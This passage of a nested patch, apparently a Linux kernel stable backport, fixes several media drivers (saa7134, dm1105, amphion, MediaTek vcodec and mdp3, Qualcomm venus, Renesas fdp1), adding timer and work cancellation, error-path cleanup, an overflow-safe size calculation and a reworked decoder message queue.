+-		 val == OV8856_1B_MODULE ? "1B" : "unknown revision",
+-		 client->addr);
+-
+-	ret = ov8856_write_reg(ov8856, OV8856_REG_MODE_SELECT,
+-			       OV8856_REG_VALUE_08BIT, OV8856_MODE_STANDBY);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to exit streaming mode");
+-		return ret;
+-	}
+-
+ 	ov8856->identified = true;
+ 
+ 	return 0;
+diff --git a/drivers/media/pci/dm1105/dm1105.c b/drivers/media/pci/dm1105/dm1105.c
+index 4ac645a56c14e..9e9c7c071accc 100644
+--- a/drivers/media/pci/dm1105/dm1105.c
++++ b/drivers/media/pci/dm1105/dm1105.c
+@@ -1176,6 +1176,7 @@ static void dm1105_remove(struct pci_dev *pdev)
+ 	struct dvb_demux *dvbdemux = &dev->demux;
+ 	struct dmx_demux *dmx = &dvbdemux->dmx;
+ 
++	cancel_work_sync(&dev->ir.work);
+ 	dm1105_ir_exit(dev);
+ 	dmx->close(dmx);
+ 	dvb_net_release(&dev->dvbnet);
+diff --git a/drivers/media/pci/saa7134/saa7134-ts.c b/drivers/media/pci/saa7134/saa7134-ts.c
+index 6a5053126237f..437dbe5e75e29 100644
+--- a/drivers/media/pci/saa7134/saa7134-ts.c
++++ b/drivers/media/pci/saa7134/saa7134-ts.c
+@@ -300,6 +300,7 @@ int saa7134_ts_start(struct saa7134_dev *dev)
+ 
+ int saa7134_ts_fini(struct saa7134_dev *dev)
+ {
++	del_timer_sync(&dev->ts_q.timeout);
+ 	saa7134_pgtable_free(dev->pci, &dev->ts_q.pt);
+ 	return 0;
+ }
+diff --git a/drivers/media/pci/saa7134/saa7134-vbi.c b/drivers/media/pci/saa7134/saa7134-vbi.c
+index 3f0b0933eed69..3e773690468bd 100644
+--- a/drivers/media/pci/saa7134/saa7134-vbi.c
++++ b/drivers/media/pci/saa7134/saa7134-vbi.c
+@@ -185,6 +185,7 @@ int saa7134_vbi_init1(struct saa7134_dev *dev)
+ int saa7134_vbi_fini(struct saa7134_dev *dev)
+ {
+ 	/* nothing */
++	del_timer_sync(&dev->vbi_q.timeout);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/pci/saa7134/saa7134-video.c b/drivers/media/pci/saa7134/saa7134-video.c
+index 4d8974c9fcc98..29124756a62bc 100644
+--- a/drivers/media/pci/saa7134/saa7134-video.c
++++ b/drivers/media/pci/saa7134/saa7134-video.c
+@@ -2146,6 +2146,7 @@ int saa7134_video_init1(struct saa7134_dev *dev)
+ 
+ void saa7134_video_fini(struct saa7134_dev *dev)
+ {
++	del_timer_sync(&dev->video_q.timeout);
+ 	/* free stuff */
+ 	saa7134_pgtable_free(dev->pci, &dev->video_q.pt);
+ 	saa7134_pgtable_free(dev->pci, &dev->vbi_q.pt);
+diff --git a/drivers/media/platform/amphion/vdec.c b/drivers/media/platform/amphion/vdec.c
+index b27e6bed85f0f..4918547793dc1 100644
+--- a/drivers/media/platform/amphion/vdec.c
++++ b/drivers/media/platform/amphion/vdec.c
+@@ -139,7 +139,31 @@ static const struct vpu_format vdec_formats[] = {
+ 	{0, 0, 0, 0},
+ };
+ 
++static int vdec_op_s_ctrl(struct v4l2_ctrl *ctrl)
++{
++	struct vpu_inst *inst = ctrl_to_inst(ctrl);
++	struct vdec_t *vdec = inst->priv;
++	int ret = 0;
++
++	vpu_inst_lock(inst);
++	switch (ctrl->id) {
++	case V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY_ENABLE:
++		vdec->params.display_delay_enable = ctrl->val;
++		break;
++	case V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY:
++		vdec->params.display_delay = ctrl->val;
++		break;
++	default:
++		ret = -EINVAL;
++		break;
++	}
++	vpu_inst_unlock(inst);
++
++	return ret;
++}
++
+ static const struct v4l2_ctrl_ops vdec_ctrl_ops = {
++	.s_ctrl = vdec_op_s_ctrl,
+ 	.g_volatile_ctrl = vpu_helper_g_volatile_ctrl,
+ };
+ 
+@@ -152,6 +176,14 @@ static int vdec_ctrl_init(struct vpu_inst *inst)
+ 	if (ret)
+ 		return ret;
+ 
++	v4l2_ctrl_new_std(&inst->ctrl_handler, &vdec_ctrl_ops,
++			  V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY,
++			  0, 0, 1, 0);
++
++	v4l2_ctrl_new_std(&inst->ctrl_handler, &vdec_ctrl_ops,
++			  V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY_ENABLE,
++			  0, 1, 1, 0);
++
+ 	ctrl = v4l2_ctrl_new_std(&inst->ctrl_handler, &vdec_ctrl_ops,
+ 				 V4L2_CID_MIN_BUFFERS_FOR_CAPTURE, 1, 32, 1, 2);
+ 	if (ctrl)
+diff --git a/drivers/media/platform/amphion/vpu_codec.h b/drivers/media/platform/amphion/vpu_codec.h
+index 528a93f08ecd4..bac6d0d94f8a5 100644
+--- a/drivers/media/platform/amphion/vpu_codec.h
++++ b/drivers/media/platform/amphion/vpu_codec.h
+@@ -55,7 +55,8 @@ struct vpu_encode_params {
+ struct vpu_decode_params {
+ 	u32 codec_format;
+ 	u32 output_format;
+-	u32 b_dis_reorder;
++	u32 display_delay_enable;
++	u32 display_delay;
+ 	u32 b_non_frame;
+ 	u32 frame_count;
+ 	u32 end_flag;
+diff --git a/drivers/media/platform/amphion/vpu_malone.c b/drivers/media/platform/amphion/vpu_malone.c
+index 9f2890730fd70..ae094cdc9bfc8 100644
+--- a/drivers/media/platform/amphion/vpu_malone.c
++++ b/drivers/media/platform/amphion/vpu_malone.c
+@@ -640,7 +640,9 @@ static int vpu_malone_set_params(struct vpu_shared_addr *shared,
+ 		hc->jpg[instance].jpg_mjpeg_interlaced = 0;
+ 	}
+ 
+-	hc->codec_param[instance].disp_imm = params->b_dis_reorder ? 1 : 0;
++	hc->codec_param[instance].disp_imm = params->display_delay_enable ? 1 : 0;
++	if (malone_format != MALONE_FMT_AVC)
++		hc->codec_param[instance].disp_imm = 0;
+ 	hc->codec_param[instance].dbglog_enable = 0;
+ 	iface->dbglog_desc.level = 0;
+ 
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c
+index 5f74ea3b7a524..8612a48bde10f 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c
+@@ -566,7 +566,11 @@ static int mdp_m2m_open(struct file *file)
+ 		goto err_free_ctx;
+ 	}
+ 
+-	ctx->id = ida_alloc(&mdp->mdp_ida, GFP_KERNEL);
++	ret = ida_alloc(&mdp->mdp_ida, GFP_KERNEL);
++	if (ret < 0)
++		goto err_unlock_mutex;
++	ctx->id = ret;
++
+ 	ctx->mdp_dev = mdp;
+ 
+ 	v4l2_fh_init(&ctx->fh, vdev);
+@@ -617,6 +621,8 @@ err_release_handler:
+ 	v4l2_fh_del(&ctx->fh);
+ err_exit_fh:
+ 	v4l2_fh_exit(&ctx->fh);
++	ida_free(&mdp->mdp_ida, ctx->id);
++err_unlock_mutex:
+ 	mutex_unlock(&mdp->m2m_lock);
+ err_free_ctx:
+ 	kfree(ctx);
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c
+index 4e84a37ecdfc1..36336d169bd91 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c
+@@ -4,6 +4,7 @@
+  * Author: Ping-Hsun Wu <ping-hsun.wu@mediatek.com>
+  */
+ 
++#include <linux/math64.h>
+ #include <media/v4l2-common.h>
+ #include <media/videobuf2-v4l2.h>
+ #include <media/videobuf2-dma-contig.h>
+@@ -428,14 +429,15 @@ const struct mdp_format *mdp_try_fmt_mplane(struct v4l2_format *f,
+ 		u32 bpl = pix_mp->plane_fmt[i].bytesperline;
+ 		u32 min_si, max_si;
+ 		u32 si = pix_mp->plane_fmt[i].sizeimage;
++		u64 di;
+ 
+ 		bpl = clamp(bpl, min_bpl, max_bpl);
+ 		pix_mp->plane_fmt[i].bytesperline = bpl;
+ 
+-		min_si = (bpl * pix_mp->height * fmt->depth[i]) /
+-			 fmt->row_depth[i];
+-		max_si = (bpl * s.max_height * fmt->depth[i]) /
+-			 fmt->row_depth[i];
++		di = (u64)bpl * pix_mp->height * fmt->depth[i];
++		min_si = (u32)div_u64(di, fmt->row_depth[i]);
++		di = (u64)bpl * s.max_height * fmt->depth[i];
++		max_si = (u32)div_u64(di, fmt->row_depth[i]);
+ 
+ 		si = clamp(si, min_si, max_si);
+ 		pix_mp->plane_fmt[i].sizeimage = si;
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
+index 641f533c417fd..c99705681a03e 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
+@@ -39,10 +39,9 @@ static bool mtk_vdec_get_cap_fmt(struct mtk_vcodec_ctx *ctx, int format_index)
+ {
+ 	const struct mtk_vcodec_dec_pdata *dec_pdata = ctx->dev->vdec_pdata;
+ 	const struct mtk_video_fmt *fmt;
+-	struct mtk_q_data *q_data;
+ 	int num_frame_count = 0, i;
+-	bool ret = true;
+ 
++	fmt = &dec_pdata->vdec_formats[format_index];
+ 	for (i = 0; i < *dec_pdata->num_formats; i++) {
+ 		if (dec_pdata->vdec_formats[i].type != MTK_FMT_FRAME)
+ 			continue;
+@@ -50,27 +49,10 @@ static bool mtk_vdec_get_cap_fmt(struct mtk_vcodec_ctx *ctx, int format_index)
+ 		num_frame_count++;
+ 	}
+ 
+-	if (num_frame_count == 1)
++	if (num_frame_count == 1 || fmt->fourcc == V4L2_PIX_FMT_MM21)
+ 		return true;
+ 
+-	fmt = &dec_pdata->vdec_formats[format_index];
+-	q_data = &ctx->q_data[MTK_Q_DATA_SRC];
+-	switch (q_data->fmt->fourcc) {
+-	case V4L2_PIX_FMT_VP8_FRAME:
+-		if (fmt->fourcc == V4L2_PIX_FMT_MM21)
+-			ret = true;
+-		break;
+-	case V4L2_PIX_FMT_H264_SLICE:
+-	case V4L2_PIX_FMT_VP9_FRAME:
+-		if (fmt->fourcc == V4L2_PIX_FMT_MM21)
+-			ret = false;
+-		break;
+-	default:
+-		ret = true;
+-		break;
+-	}
+-
+-	return ret;
++	return false;
+ }
+ 
+ static struct mtk_q_data *mtk_vdec_get_q_data(struct mtk_vcodec_ctx *ctx,
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c
+index 174a6eec2f549..42df901e8beb4 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c
+@@ -451,7 +451,8 @@ err_core_workq:
+ 	if (IS_VDEC_LAT_ARCH(dev->vdec_pdata->hw_arch))
+ 		destroy_workqueue(dev->core_workqueue);
+ err_res:
+-	pm_runtime_disable(dev->pm.dev);
++	if (!dev->vdec_pdata->is_subdev_supported)
++		pm_runtime_disable(dev->pm.dev);
+ err_dec_pm:
+ 	mtk_vcodec_fw_release(dev->fw_handler);
+ 	return ret;
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c
+index 376db0e433d75..b753bf54ebd90 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c
+@@ -193,8 +193,16 @@ err:
+ 	return ret;
+ }
+ 
++static int mtk_vdec_hw_remove(struct platform_device *pdev)
++{
++	pm_runtime_disable(&pdev->dev);
++
++	return 0;
++}
++
+ static struct platform_driver mtk_vdec_driver = {
+ 	.probe	= mtk_vdec_hw_probe,
++	.remove = mtk_vdec_hw_remove,
+ 	.driver	= {
+ 		.name	= "mtk-vdec-comp",
+ 		.of_match_table = mtk_vdec_hw_match,
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
+index 035c86e7809fd..29991551cf614 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
+@@ -11,7 +11,7 @@
+ #include "mtk_vcodec_dec_pm.h"
+ #include "vdec_drv_if.h"
+ 
+-static const struct mtk_video_fmt mtk_video_formats[] = {
++static struct mtk_video_fmt mtk_video_formats[] = {
+ 	{
+ 		.fourcc = V4L2_PIX_FMT_H264,
+ 		.type = MTK_FMT_DEC,
+@@ -580,6 +580,16 @@ static int mtk_vcodec_dec_ctrls_setup(struct mtk_vcodec_ctx *ctx)
+ 
+ static void mtk_init_vdec_params(struct mtk_vcodec_ctx *ctx)
+ {
++	unsigned int i;
++
++	if (!(ctx->dev->dec_capability & VCODEC_CAPABILITY_4K_DISABLED)) {
++		for (i = 0; i < num_supported_formats; i++) {
++			mtk_video_formats[i].frmsize.max_width =
++				VCODEC_DEC_4K_CODED_WIDTH;
++			mtk_video_formats[i].frmsize.max_height =
++				VCODEC_DEC_4K_CODED_HEIGHT;
++		}
++	}
+ }
+ 
+ static struct vb2_ops mtk_vdec_frame_vb2_ops = {
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
+index ffbcee04dc26f..3000db975e5f5 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
+@@ -258,8 +258,10 @@ static void mtk_vdec_worker(struct work_struct *work)
+ 		if (src_buf_req)
+ 			v4l2_ctrl_request_complete(src_buf_req, &ctx->ctrl_hdl);
+ 	} else {
+-		v4l2_m2m_src_buf_remove(ctx->m2m_ctx);
+-		v4l2_m2m_buf_done(vb2_v4l2_src, state);
++		if (ret != -EAGAIN) {
++			v4l2_m2m_src_buf_remove(ctx->m2m_ctx);
++			v4l2_m2m_buf_done(vb2_v4l2_src, state);
++		}
+ 		v4l2_m2m_job_finish(dev->m2m_dev_dec, ctx->m2m_ctx);
+ 	}
+ }
+@@ -390,14 +392,14 @@ static void mtk_vcodec_get_supported_formats(struct mtk_vcodec_ctx *ctx)
+ 	if (num_formats)
+ 		return;
+ 
+-	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_MM21) {
+-		mtk_vcodec_add_formats(V4L2_PIX_FMT_MM21, ctx);
+-		cap_format_count++;
+-	}
+ 	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_MT21C) {
+ 		mtk_vcodec_add_formats(V4L2_PIX_FMT_MT21C, ctx);
+ 		cap_format_count++;
+ 	}
++	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_MM21) {
++		mtk_vcodec_add_formats(V4L2_PIX_FMT_MM21, ctx);
++		cap_format_count++;
++	}
+ 	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_H264_SLICE) {
+ 		mtk_vcodec_add_formats(V4L2_PIX_FMT_H264_SLICE, ctx);
+ 		out_format_count++;
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
+index 955b2d0c8f53f..999ce7ee5fdc2 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
+@@ -597,7 +597,7 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	lat_buf = vdec_msg_queue_dqbuf(&inst->ctx->msg_queue.lat_ctx);
+ 	if (!lat_buf) {
+ 		mtk_vcodec_err(inst, "failed to get lat buffer");
+-		return -EINVAL;
++		return -EAGAIN;
+ 	}
+ 	share_info = lat_buf->private_data;
+ 	src_buf_info = container_of(bs, struct mtk_video_dec_buf, bs_buffer);
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
+index cbb6728b8a40b..cf16cf2807f07 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
+@@ -2070,7 +2070,7 @@ static int vdec_vp9_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	lat_buf = vdec_msg_queue_dqbuf(&instance->ctx->msg_queue.lat_ctx);
+ 	if (!lat_buf) {
+ 		mtk_vcodec_err(instance, "Failed to get VP9 lat buf\n");
+-		return -EBUSY;
++		return -EAGAIN;
+ 	}
+ 	pfc = (struct vdec_vp9_slice_pfc *)lat_buf->private_data;
+ 	if (!pfc) {
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+index dc2004790a472..f3073d1e7f420 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+@@ -52,9 +52,26 @@ static struct list_head *vdec_get_buf_list(int hardware_index, struct vdec_lat_b
+ 	}
+ }
+ 
++static void vdec_msg_queue_inc(struct vdec_msg_queue *msg_queue, int hardware_index)
++{
++	if (hardware_index == MTK_VDEC_CORE)
++		atomic_inc(&msg_queue->core_list_cnt);
++	else
++		atomic_inc(&msg_queue->lat_list_cnt);
++}
++
++static void vdec_msg_queue_dec(struct vdec_msg_queue *msg_queue, int hardware_index)
++{
++	if (hardware_index == MTK_VDEC_CORE)
++		atomic_dec(&msg_queue->core_list_cnt);
++	else
++		atomic_dec(&msg_queue->lat_list_cnt);
++}
++
+ int vdec_msg_queue_qbuf(struct vdec_msg_queue_ctx *msg_ctx, struct vdec_lat_buf *buf)
+ {
+ 	struct list_head *head;
++	int status;
+ 
+ 	head = vdec_get_buf_list(msg_ctx->hardware_index, buf);
+ 	if (!head) {
+@@ -66,11 +83,18 @@ int vdec_msg_queue_qbuf(struct vdec_msg_queue_ctx *msg_ctx, struct vdec_lat_buf
+ 	list_add_tail(head, &msg_ctx->ready_queue);
+ 	msg_ctx->ready_num++;
+ 
+-	if (msg_ctx->hardware_index != MTK_VDEC_CORE)
++	vdec_msg_queue_inc(&buf->ctx->msg_queue, msg_ctx->hardware_index);
++	if (msg_ctx->hardware_index != MTK_VDEC_CORE) {
+ 		wake_up_all(&msg_ctx->ready_to_use);
+-	else
+-		queue_work(buf->ctx->dev->core_workqueue,
+-			   &buf->ctx->msg_queue.core_work);
++	} else {
++		if (buf->ctx->msg_queue.core_work_cnt <
++			atomic_read(&buf->ctx->msg_queue.core_list_cnt)) {
++			status = queue_work(buf->ctx->dev->core_workqueue,
++					    &buf->ctx->msg_queue.core_work);
++			if (status)
++				buf->ctx->msg_queue.core_work_cnt++;
++		}
++	}
+ 
+ 	mtk_v4l2_debug(3, "enqueue buf type: %d addr: 0x%p num: %d",
+ 		       msg_ctx->hardware_index, buf, msg_ctx->ready_num);
+@@ -127,6 +151,7 @@ struct vdec_lat_buf *vdec_msg_queue_dqbuf(struct vdec_msg_queue_ctx *msg_ctx)
+ 		return NULL;
+ 	}
+ 	list_del(head);
++	vdec_msg_queue_dec(&buf->ctx->msg_queue, msg_ctx->hardware_index);
+ 
+ 	msg_ctx->ready_num--;
+ 	mtk_v4l2_debug(3, "dqueue buf type:%d addr: 0x%p num: %d",
+@@ -156,11 +181,29 @@ void vdec_msg_queue_update_ube_wptr(struct vdec_msg_queue *msg_queue, uint64_t u
+ 
+ bool vdec_msg_queue_wait_lat_buf_full(struct vdec_msg_queue *msg_queue)
+ {
++	struct vdec_lat_buf *buf, *tmp;
++	struct list_head *list_core[3];
++	struct vdec_msg_queue_ctx *core_ctx;
++	int ret, i, in_core_count = 0, count = 0;
+ 	long timeout_jiff;
+-	int ret;
++
++	core_ctx = &msg_queue->ctx->dev->msg_queue_core_ctx;
++	spin_lock(&core_ctx->ready_lock);
++	list_for_each_entry_safe(buf, tmp, &core_ctx->ready_queue, core_list) {
++		if (buf && buf->ctx == msg_queue->ctx) {
++			list_core[in_core_count++] = &buf->core_list;
++			list_del(&buf->core_list);
++		}
++	}
++
++	for (i = 0; i < in_core_count; i++) {
++		list_add(list_core[in_core_count - (1 + i)], &core_ctx->ready_queue);
++		queue_work(msg_queue->ctx->dev->core_workqueue, &msg_queue->core_work);
++	}
++	spin_unlock(&core_ctx->ready_lock);
+ 
+ 	timeout_jiff = msecs_to_jiffies(1000 * (NUM_BUFFER_COUNT + 2));
+-	ret = wait_event_timeout(msg_queue->lat_ctx.ready_to_use,
++	ret = wait_event_timeout(msg_queue->ctx->msg_queue.core_dec_done,
+ 				 msg_queue->lat_ctx.ready_num == NUM_BUFFER_COUNT,
+ 				 timeout_jiff);
+ 	if (ret) {
+@@ -168,8 +211,20 @@ bool vdec_msg_queue_wait_lat_buf_full(struct vdec_msg_queue *msg_queue)
+ 			       msg_queue->lat_ctx.ready_num);
+ 		return true;
+ 	}
+-	mtk_v4l2_err("failed with lat buf isn't full: %d",
+-		     msg_queue->lat_ctx.ready_num);
++
++	spin_lock(&core_ctx->ready_lock);
++	list_for_each_entry_safe(buf, tmp, &core_ctx->ready_queue, core_list) {
++		if (buf && buf->ctx == msg_queue->ctx) {
++			count++;
++			list_del(&buf->core_list);
++		}
++	}
++	spin_unlock(&core_ctx->ready_lock);
++
++	mtk_v4l2_err("failed with lat buf isn't full: list(%d %d) count:%d",
++		     atomic_read(&msg_queue->lat_list_cnt),
++		     atomic_read(&msg_queue->core_list_cnt), count);
++
+ 	return false;
+ }
+ 
+@@ -206,6 +261,7 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 		container_of(msg_queue, struct mtk_vcodec_ctx, msg_queue);
+ 	struct mtk_vcodec_dev *dev = ctx->dev;
+ 	struct vdec_lat_buf *lat_buf;
++	int status;
+ 
+ 	lat_buf = vdec_msg_queue_dqbuf(&dev->msg_queue_core_ctx);
+ 	if (!lat_buf)
+@@ -221,11 +277,18 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 	mtk_vcodec_dec_disable_hardware(ctx, MTK_VDEC_CORE);
+ 	vdec_msg_queue_qbuf(&ctx->msg_queue.lat_ctx, lat_buf);
+ 
+-	if (!list_empty(&dev->msg_queue_core_ctx.ready_queue)) {
+-		mtk_v4l2_debug(3, "re-schedule to decode for core: %d",
+-			       dev->msg_queue_core_ctx.ready_num);
+-		queue_work(dev->core_workqueue, &msg_queue->core_work);
++	wake_up_all(&ctx->msg_queue.core_dec_done);
++	spin_lock(&dev->msg_queue_core_ctx.ready_lock);
++	lat_buf->ctx->msg_queue.core_work_cnt--;
++
++	if (lat_buf->ctx->msg_queue.core_work_cnt <
++		atomic_read(&lat_buf->ctx->msg_queue.core_list_cnt)) {
++		status = queue_work(lat_buf->ctx->dev->core_workqueue,
++				    &lat_buf->ctx->msg_queue.core_work);
++		if (status)
++			lat_buf->ctx->msg_queue.core_work_cnt++;
+ 	}
++	spin_unlock(&dev->msg_queue_core_ctx.ready_lock);
+ }
+ 
+ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+@@ -239,12 +302,18 @@ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+ 	if (msg_queue->wdma_addr.size)
+ 		return 0;
+ 
++	msg_queue->ctx = ctx;
++	msg_queue->core_work_cnt = 0;
+ 	vdec_msg_queue_init_ctx(&msg_queue->lat_ctx, MTK_VDEC_LAT0);
+ 	INIT_WORK(&msg_queue->core_work, vdec_msg_queue_core_work);
++
++	atomic_set(&msg_queue->lat_list_cnt, 0);
++	atomic_set(&msg_queue->core_list_cnt, 0);
++	init_waitqueue_head(&msg_queue->core_dec_done);
++
+ 	msg_queue->wdma_addr.size =
+ 		vde_msg_queue_get_trans_size(ctx->picinfo.buf_w,
+ 					     ctx->picinfo.buf_h);
+-
+ 	err = mtk_vcodec_mem_alloc(ctx, &msg_queue->wdma_addr);
+ 	if (err) {
+ 		mtk_v4l2_err("failed to allocate wdma_addr buf");
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
+index c43d427f5f544..a5d44bc97c16b 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
+@@ -72,6 +72,12 @@ struct vdec_lat_buf {
+  * @wdma_wptr_addr: ube write point
+  * @core_work: core hardware work
+  * @lat_ctx: used to store lat buffer list
++ * @ctx: point to mtk_vcodec_ctx
++ *
++ * @lat_list_cnt: used to record each instance lat list count
++ * @core_list_cnt: used to record each instance core list count
++ * @core_dec_done: core work queue decode done event
++ * @core_work_cnt: the number of core work in work queue
+  */
+ struct vdec_msg_queue {
+ 	struct vdec_lat_buf lat_buf[NUM_BUFFER_COUNT];
+@@ -82,6 +88,12 @@ struct vdec_msg_queue {
+ 
+ 	struct work_struct core_work;
+ 	struct vdec_msg_queue_ctx lat_ctx;
++	struct mtk_vcodec_ctx *ctx;
++
++	atomic_t lat_list_cnt;
++	atomic_t core_list_cnt;
++	wait_queue_head_t core_dec_done;
++	int core_work_cnt;
+ };
+ 
+ /**
+diff --git a/drivers/media/platform/qcom/venus/vdec.c b/drivers/media/platform/qcom/venus/vdec.c
+index 4ceaba37e2e57..1a52c2ea2da5b 100644
+--- a/drivers/media/platform/qcom/venus/vdec.c
++++ b/drivers/media/platform/qcom/venus/vdec.c
+@@ -31,15 +31,15 @@
+  */
+ static const struct venus_format vdec_formats[] = {
+ 	{
+-		.pixfmt = V4L2_PIX_FMT_QC08C,
++		.pixfmt = V4L2_PIX_FMT_NV12,
+ 		.num_planes = 1,
+ 		.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE,
+ 	}, {
+-		.pixfmt = V4L2_PIX_FMT_QC10C,
++		.pixfmt = V4L2_PIX_FMT_QC08C,
+ 		.num_planes = 1,
+ 		.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE,
+-	},{
+-		.pixfmt = V4L2_PIX_FMT_NV12,
++	}, {
++		.pixfmt = V4L2_PIX_FMT_QC10C,
+ 		.num_planes = 1,
+ 		.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE,
+ 	}, {
+@@ -526,6 +526,7 @@ static int
+ vdec_decoder_cmd(struct file *file, void *fh, struct v4l2_decoder_cmd *cmd)
+ {
+ 	struct venus_inst *inst = to_inst(file);
++	struct vb2_queue *dst_vq;
+ 	struct hfi_frame_data fdata = {0};
+ 	int ret;
+ 
+@@ -556,6 +557,13 @@ vdec_decoder_cmd(struct file *file, void *fh, struct v4l2_decoder_cmd *cmd)
+ 			inst->codec_state = VENUS_DEC_STATE_DRAIN;
+ 			inst->drain_active = true;
+ 		}
++	} else if (cmd->cmd == V4L2_DEC_CMD_START &&
++		   inst->codec_state == VENUS_DEC_STATE_STOPPED) {
++		dst_vq = v4l2_m2m_get_vq(inst->fh.m2m_ctx,
++					 V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE);
++		vb2_clear_last_buffer_dequeued(dst_vq);
++
++		inst->codec_state = VENUS_DEC_STATE_DECODING;
+ 	}
+ 
+ unlock:
+diff --git a/drivers/media/platform/renesas/rcar_fdp1.c b/drivers/media/platform/renesas/rcar_fdp1.c
+index 37ecf489d112e..dea22e3579052 100644
+--- a/drivers/media/platform/renesas/rcar_fdp1.c
++++ b/drivers/media/platform/renesas/rcar_fdp1.c
+@@ -2313,8 +2313,10 @@ static int fdp1_probe(struct platform_device *pdev)
+ 
+ 	/* Determine our clock rate */
+ 	clk = clk_get(&pdev->dev, NULL);
+-	if (IS_ERR(clk))
+-		return PTR_ERR(clk);
++	if (IS_ERR(clk)) {
++		ret = PTR_ERR(clk);
++		goto put_dev;
++	}
+ 
+ 	fdp1->clk_rate = clk_get_rate(clk);
+ 	clk_put(clk);
+@@ -2323,7 +2325,7 @@ static int fdp1_probe(struct platform_device *pdev)
+ 	ret = v4l2_device_register(&pdev->dev, &fdp1->v4l2_dev);
+ 	if (ret) {
+ 		v4l2_err(&fdp1->v4l2_dev, "Failed to register video device\n");
+-		return ret;
++		goto put_dev;
+ 	}
+ 
+ 	/* M2M registration */
+@@ -2393,6 +2395,8 @@ release_m2m:
+ unreg_dev:
+ 	v4l2_device_unregister(&fdp1->v4l2_dev);
+ 
++put_dev:
++	rcar_fcp_put(fdp1->fcp);
+ 	return ret;
+ }
+ 
+@@ -2404,6 +2408,7 @@ static int fdp1_remove(struct platform_device *pdev)
+ 	video_unregister_device(&fdp1->vfd);
+ 	v4l2_device_unregister(&fdp1->v4l2_dev);
+ 	pm_runtime_disable(&pdev->dev);
++	rcar_fcp_put(fdp1->fcp);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c b/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c
+index dd74cc43920d3..080da254b9109 100644
+--- a/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c
